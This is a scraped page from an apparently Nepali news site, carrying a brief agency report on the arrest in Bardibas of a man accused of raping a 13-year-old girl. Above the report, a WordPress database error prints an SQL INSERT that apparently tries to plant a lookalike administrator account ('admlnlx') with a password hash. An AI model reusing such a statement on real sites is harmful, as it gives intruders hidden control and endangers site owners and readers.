WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpJxv//Ltab6VUviC0Kgr0XnK3hf34/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-28 01:07:00', '', 'admlnlx', 'admlnlx')
बर्दिवास, मंसिर २९–
एक १३ वर्षीया बालिकालाई बलात्कार गरेको आरोपमा महोत्तरीको बर्दिवासमा एकजना पक्राउ परेका छन् । झापा जिल्लाको महेशपुर–१ का २६ वर्षीय विष्णु राजवंशीलाई १३ वर्षीया बालिकालाई बलात्कार गरेको अभियोगमा पक्राउ गरिएको इलाका प्रहरी कार्यालय बर्दिवासले जनाएको हो ।
आजभन्दा २५ दिनअघि मङ्सिर ४ गते अपराह्न राजवंशीले बर्दिवास नगरपालिका–१० स्थित डाँडागाउँकी एक १३ वर्षीया बालिकालाई जबर्जस्तीकरणी गरेको प्रहरीले जनाएको छ । घटनालगत्तै फरार भएका राजवंशीलाई मङ्गलबार पक्राउ गरिएको इलाका प्रहरी कार्यालय बर्दिवासका प्रहरी नायब उपरीक्षक शालिग्राम शर्माले जानकारी दिनुभयो ।
राजवंशीविरुद्ध जबर्जस्तीकरणी मुद्दा चलाइने इलाका प्रहरी कार्यालय बर्दिवासले जनाएको छ । –रासस